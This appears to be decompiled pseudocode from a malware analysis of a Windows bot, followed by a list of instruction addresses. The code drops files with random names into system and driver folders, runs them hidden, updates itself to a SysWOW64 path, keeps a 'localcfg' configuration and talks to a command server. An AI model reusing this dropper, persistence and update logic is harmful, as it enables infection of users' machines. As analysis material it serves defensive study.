																					_t413 = E0032C65C(_v16,  &_v640,  &_v92,  *0x3336b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x3336b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E00327DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0032F04E(0);
																		__eflags =  *0x3336ac - _t748; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x3321a4; // 0x4c800
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x3336b0; // 0x3e00000
																				 *_t418 = 0;
																				_t733 =  *0x3321a4; // 0x4c800
																				_t418[4] = _t733;
																				_t734 =  *0x3322d4; // 0xe4db185b
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0032C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0032675C("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x3322d4 = E003224C2(_t791, _v72, 0);
																				 *0x3321a4 = _v72;
																				E0032EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x3321a4; // 0x4c800
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x3336a8 - _t417; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0032E854(1, "localcfg", "except_info",  *0x3336b0, 0x100000, 0x330264);
																	_t428 =  *0x3336b0; // 0x3e00000
																	_t811 = _t811 + 0x18;
																	_t304 =  &(_t428[1]); // 0x3e00001
																	_t736 = _t304;
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0032E8A1(_t748, 1, "localcfg", "except_info", 0x330264);
																	_v39 = 0xf;
																	_t434 = E0032C65C(_v16,  &_v640,  &_v92,  *0x3336b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x332184; // 0x0
																if(__eflags != 0) {
																	E00326F5F( &_v408, 0x120);
																	_t449 =  *0x332130; // 0x210
																	_push(0x332184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x332159 & 0x000000ff);
																	_push( *0x332134);
																	_push( *0x332120);
																	_t456 = wsprintfA( *0x3336b0, E00322544(0x3322f8, 0x330fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x3322d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0032C65C(_v16,  &_v640,  &_v92,  *0x3336b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x332184; // 0x0
																	if(__eflags != 0) {
																		 *0x332184 = 0;
																	}
																	_t439 =  *0x3322d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0032EC2E(_t439);
																		 *0x3322d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	_t444 =  *0x3336b0; // 0x3e00000
																	E0032EE08( &(_t444[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0032C06C( &_v24,  &_v39,  *0x3336b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0032C65C(_t757,  &_v640,  &_v92,  *0x3336b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x3336b0);
														_t463 = E0032E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0032C65C(_t757,  &_v640,  &_v92,  *0x3336b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00323A00(_t697,  *0x3336b0);
													_v39 = 3;
													_t472 = E0032C65C(_t757,  &_v640,  &_v92,  *0x3336b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00323C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0032C65C(_t757,  &_v640,  &_v92,  *0x3336b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x3336b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0032DF4C(_t748,  *0x3336b0);
												__eflags = _t479;
												if(_t479 != 0) {
													_t480 =  *0x3336b0; // 0x3e00000
													E0032ED3B( &(_t480[4]), "work_srv", 8);
													_t483 =  *0x3336b0; // 0x3e00000
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0032EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x333680 = 0;
															 *0x333674 = 0;
															 *0x333678 = 0;
															 *0x33367c = 0;
															E0032C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E003231D0( *0x3336b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t249 = _t763 + 0x333300; // 0x0
													_t488 =  *_t249;
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x3336b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x3336b0; // 0x3e00000
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t701 =  *0x3336b0; // 0x3e00000
													_t93 = _t764 * 8; // 0x3e00004
													_t797 =  &(_t701[_t93 + 4]);
													_t492 = _v52 + 4 + _t764 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0032EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x33201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0032EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E00322544(0x3322f8, 0x330a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0032EE2A(_t711, 0x3322f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	goto L77;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																	L77:
																	_t711 =  *_t607;
																	_t607 = _t607 + 1;
																	__eflags = _t711;
																	if(_t711 != 0) {
																		goto L77;
																	} else {
																		_t765 = _t607 - _t779;
																		goto L83;
																	}
																}
															} else {
																_t109 =  &(_t797[4]); // 0x3e00008
																_t780 = _t109;
																_t609 = _t109;
																_t110 =  &(_t609[1]); // 0x3e00009
																_t726 = _t110;
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t165 =  &(_t797[0x104]); // 0x3e00108
																		_t502 = _t165;
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E00328E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0032EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0032EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E00322544(0x3322f8, 0x330a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0032EE2A(_t711, 0x3322f8, 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			_t210 =  &(_t797[0x104]); // 0x3e00108
																			lstrcatA( &_v408, _t210);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0032EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				_t218 =  &(_t797[0x128]); // 0x3e0012c
																				WriteFile(_t769, _t218, _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0032EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			_t176 =  &(_t797[0x128]); // 0x3e0012c
																			WriteFile(_t766, _t176, _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0032EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0032EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E00328E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E00327EAD(_t748, __eflags, 1);
																						E00327FCF(_t712);
																						_t770 = 0x44;
																						E0032EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x330264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E00327EE6(_t712);
																							E00327EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0032EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E00322544(0x3322f8, 0x330a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0032EE2A(_t712, 0x3322f8, 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				_t190 =  &(_t797[0x104]); // 0x3e00108
																				lstrcatA( &_v408, _t190);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0032EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					_t198 =  &(_t797[0x128]); // 0x3e0012c
																					WriteFile(_t774, _t198, _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0032EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0032ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E00322544(0x3322f8, 0x330694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0032ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0032EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x33211c & 0x00000004;
													if(( *0x33211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x33201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0032E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x332138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0032EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x33213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0032EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x33211c =  *0x33211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x3336b0; // 0x3e00000
												 *0x3321a4 = _t630[4];
												 *0x3322d4 = _t630[8];
												_t632 = E0032F04E(0);
												asm("adc edx, ebx");
												 *0x3336a8 = _t632 + 0xe10;
												 *0x3336ac = _t748;
												continue;
											}
											_t634 = E00327E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_t635 =  *0x3336b0; // 0x3e00000
											_v12 = _t635;
											__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x3321a4 =  *(_t636 + 4);
												 *0x3322d4 =  *(_t636 + 8);
												E00327EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E00328274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0032ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0032ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0032EF00(_t806 + _t782 - 0x194, E00322544(0x3322f8, 0x330694, 5, 0xe4, 0xc8));
													E0032EE2A(_t709, 0x3322f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe");
															_push( &_v408);
															wsprintfA( &_v1176, E00322544(0x3322f8, 0x330fe4, 0xc, 0xe4, 0xc8));
															E0032EE2A(_t709, 0x3322f8, 0, 0x100);
															_t803 = 0x44;
															E0032EE2A(_t709,  &_v808, 0, 0x3322f8);
															_v808.cb = _t803;
															E0032EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E00327FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0032F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x3336a8 = _t681;
																 *0x3336ac = _t748;
															}
															E00327EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0032E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16); // executed
							}
							return E0032C8AA(_t829);
						} else {
							_t805 =  *0x333670; // 0x2
							while(_v12 < _t805) {
								_t7 = _t747 + 1; // 0x1
								asm("cdq");
								_t747 = _t7 % _t805;
								 *0x33367c =  *0x33367c + 1;
								_v12 = _v12 + 1;
								 *0x333674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0032EBCC(0x100000);
					 *0x3336b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
				_t820 =  *0x333670; // 0x2
				if(_t820 != 0) {
					goto L3;
				}
				goto L2;
			}

0x0032c921
0x0032c924
0x0032c927
0x0032c92d
0x0032c937
0x0032c937
0x0032c93c
0x0032c93c
0x0032c942
0x0032cb69
0x0032cb69
0x00000000
0x0032cb69
0x0032c948
0x0032c94e
0x00000000
0x00000000
0x0032c973
0x0032c986
0x0032c98b
0x0032c990
0x0032c993
0x0032c998
0x0032c99e
0x0032c9b8
0x0032c9b8
0x0032c9be
0x0032c9c9
0x0032c9d0
0x0032c9fd
0x0032c9fd
0x0032ca00
0x0032ca03
0x0032ca08
0x00000000
0x00000000
0x0032ca18
0x0032ca1f
0x0032ca22
0x0032ca24
0x0032ca3f
0x0032ca44
0x0032ca47
0x0032ca49
0x0032ca5e
0x0032ca63
0x0032ca6e
0x0032ca6f
0x00000000
0x00000000
0x0032ca71
0x0032ca78
0x00000000
0x00000000
0x0032ca7a
0x0032ca81
0x00000000
0x00000000
0x0032ca95
0x0032ca9b
0x0032caa1
0x0032caa7
0x0032cab8
0x0032cac2
0x0032cac5
0x0032cad4
0x0032cae7
0x0032caf7
0x0032cb09
0x0032cb27
0x0032cb2d
0x0032cb37
0x0032cb3d
0x0032cb47
0x0032cb4d
0x0032cb54
0x0032cb59
0x0032cb5c
0x0032cb5e
0x0032cb70
0x0032cb76
0x0032cb7c
0x0032cb7c
0x0032cb7c
0x0032cb9e
0x0032cba3
0x0032cba6
0x0032cba9
0x00000000
0x00000000
0x0032cbaf
0x0032cbb1
0x00000000
0x00000000
0x0032cbb3
0x0032cbb6
0x0032cbb8
0x0032daea
0x0032daea
0x0032daeb
0x0032daf0
0x0032daf2
0x0032daf5
0x0032daf7
0x0032dafd
0x0032daff
0x0032db02
0x0032db0b
0x0032db1b
0x0032db20
0x0032db20
0x0032db02
0x0032dafd
0x0032db23
0x0032db24
0x0032db24
0x00000000
0x0032db29
0x0032cbbe
0x0032cbc1
0x0032d662
0x0032d667
0x0032d669
0x0032d66c
0x0032d66f
0x0032d672
0x0032d675
0x0032d6c7
0x0032d6c7
0x0032d6cb
0x0032d707
0x0032d707
0x0032d70b
0x0032d754
0x0032d754
0x0032d758
0x0032d79e
0x0032d79e
0x0032d7a2
0x0032d8b3
0x0032d8b3
0x0032d8ba
0x0032d93a
0x0032d93a
0x0032d941
0x0032da0e
0x0032da0e
0x0032da11
0x0032da11
0x0032da14
0x00000000
0x00000000
0x0032da1d
0x0032da23
0x0032da25
0x0032da90
0x0032da90
0x0032da94
0x0032da9b
0x00000000
0x00000000
0x0032daa1
0x0032daa4
0x00000000
0x00000000
0x0032dabf
0x0032dac2
0x0032dac7
0x0032daca
0x0032dacc
0x00000000
0x00000000
0x00000000
0x0032dacc
0x0032da27
0x0032da2a
0x0032da2c
0x00000000
0x00000000
0x0032da42
0x0032da7d
0x0032da7d
0x0032da80
0x0032da83
0x0032da85
0x00000000
0x00000000
0x0032da5f
0x0032da64
0x0032da67
0x0032da69
0x0032da89
0x00000000
0x0032da89
0x0032da7a
0x0032da7a
0x00000000
0x0032da87
0x00000000
0x0032da11
0x0032d947
0x0032d94c
0x0032d94e
0x00000000
0x00000000
0x0032d955
0x0032d95b
0x0032d961
0x00000000
0x00000000
0x0032d967
0x0032d975
0x0032d975
0x0032d97b
0x00000000
0x00000000
0x0032d981
0x0032d987
0x0032d9c9
0x0032d9c9
0x0032d9ce
0x0032d9d0
0x0032d9d6
0x0032d9d9
0x0032d9df
0x0032d9f7
0x0032d9fe
0x0032da03
0x0032da06
0x0032da08
0x00000000
0x00000000
0x00000000
0x0032da08
0x0032d998
0x0032d99a
0x0032d99d
0x0032d99f
0x0032d9ab
0x0032d9b4
0x0032d9b9
0x0032d9be
0x0032d9be
0x0032d9c1
0x0032d9c7
0x00000000
0x00000000
0x00000000
0x00000000
0x0032d9c7
0x0032d969
0x0032d96f
0x00000000
0x00000000
0x00000000
0x0032d96f
0x0032d8da
0x0032d8df
0x0032d8e4
0x0032d8e7
0x0032d8e7
0x0032d8ea
0x0032d8ea
0x0032d8ec
0x0032d8ed
0x0032d8ed
0x0032d8f1
0x0032d8f3
0x0032d8f6
0x0032d8f8
0x00000000
0x00000000
0x0032d903
0x0032d918
0x0032d92a
0x0032d92f
0x0032d932
0x0032d934
0x00000000
0x00000000
0x00000000
0x0032d934
0x0032d7a8
0x0032d7aa
0x0032d7b0
0x0032d7be
0x0032d7c3
0x0032d7cf
0x0032d7d6
0x0032d7e1
0x0032d7e2
0x0032d7e2
0x0032d7e5
0x0032d7ed
0x0032d7ee
